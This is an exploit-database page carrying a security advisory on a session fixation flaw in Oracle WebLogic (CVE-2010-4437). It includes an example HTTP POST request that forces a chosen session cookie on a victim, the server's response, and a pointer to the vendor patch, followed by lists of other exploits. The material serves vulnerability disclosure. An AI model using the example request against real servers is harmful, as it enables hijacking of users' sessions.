Menu

Search for hundreds of thousands of exploits

"Oracle WebLogic - POST Session Fixation"

Author

Exploit author

"Roberto Suggi Liverani"

Platform

Exploit platform

multiple

Release date

Exploit published date

2011-03-11

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Name	Oracle WebLogic  Session Fixation Via HTTP POST Request
Vendor Website	http://www.oracle.com/
Date Released	11 March 2011  CVE-2010-4437
Affected Software	Oracle WebLogic Server 9.0, 9.1, 9.2.4, 10.0.2, 10.3.2, 10.3.3
Researcher	Roberto Suggi Liverani

Description

Oracle WebLogic servlet session cookie can be fixated via HTTP POST request. This type of session fixation attack has been confirmed with different session descriptor elements. In particular, the attack has also been confirmed with the session descriptor element <url-rewriting-enabled> set to "False". Such setting prevents session fixation attack via HTTP GET request but fails to mitigate session fixation attacks performed over HTTP POST.

Exploitation

A malicious user obtains a valid servlet session (e.g. AFSSESSIONID) and then forces a user to perform an HTTP POST request which sets the AFSSESSIONID cookie into the user's browser. The cookie AFSESSIONID is passed as a parameter within the body of the HTTP POST request to the Oracle WebLogic Server, as shown below:
Session Fixation Via HTTP POST Request
POST /test/test.jsp HTTP/1.1
Host: 192.168.0.100:7001
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
AFSSESSIONID=kWCsMjVKKvRh0ct14JJltYTrmXBWyBqh8brv6wfjrVrk4K2mB1yv!1587485378
HTTP/1.1 200 OK
Date: Thu, 12 Aug 2010 11:18:42 GMT
Content-Length: 459
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: AFSSESSIONID=kWCsMjVKKvRh0ct14JJltYTrmXBWyBqh8brv6wfjrVrk4K2mB1yv!1587485378; path=/; HttpOnly

X-Powered-By: Servlet/2.5 JSP/2.1
Solution

Oracle has created a fix for this vulnerability which has been included as part of Critical Patch Update Advisory -January 2011. Security-Assessment.com recommends applying the latest patch provided by the vendor. For more information, visit: 

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2015-04-02 "Kemp Load Master 7.1.16 - Multiple Vulnerabilities" webapps multiple "Roberto Suggi Liverani"
2012-04-22 "Oracle GlassFish Server - REST Cross-Site Request Forgery" webapps windows "Roberto Suggi Liverani"
2012-04-22 "Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting Vulnerabilities" webapps windows "Roberto Suggi Liverani"
2011-10-21 "Opera 11.51 - Use-After-Free Crash (PoC)" dos windows "Roberto Suggi Liverani"
2011-08-11 "Adobe RoboHelp 9 - DOM Cross-Site Scripting" webapps cgi "Roberto Suggi Liverani"
2011-03-11 "Oracle WebLogic - POST Session Fixation" webapps multiple "Roberto Suggi Liverani"
2010-10-20 "Oracle Sun Java System Web Server - HTTP Response Splitting" webapps jsp "Roberto Suggi Liverani"
2010-10-20 "Oracle JRE - java.net.URLConnection class Same-of-Origin 'SOP' Policy Bypass" remote windows "Roberto Suggi Liverani"
2010-02-22 "Adobe (Multiple Products) - XML External Entity / XML Injection" dos multiple "Roberto Suggi Liverani"
2008-10-22 "Opera 9.60 - Persistent Cross-Site Scripting" remote windows "Roberto Suggi Liverani"
2008-04-29 "SugarCRM Community Edition 4.5.1/5.0.0 - File Disclosure" webapps php "Roberto Suggi Liverani" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected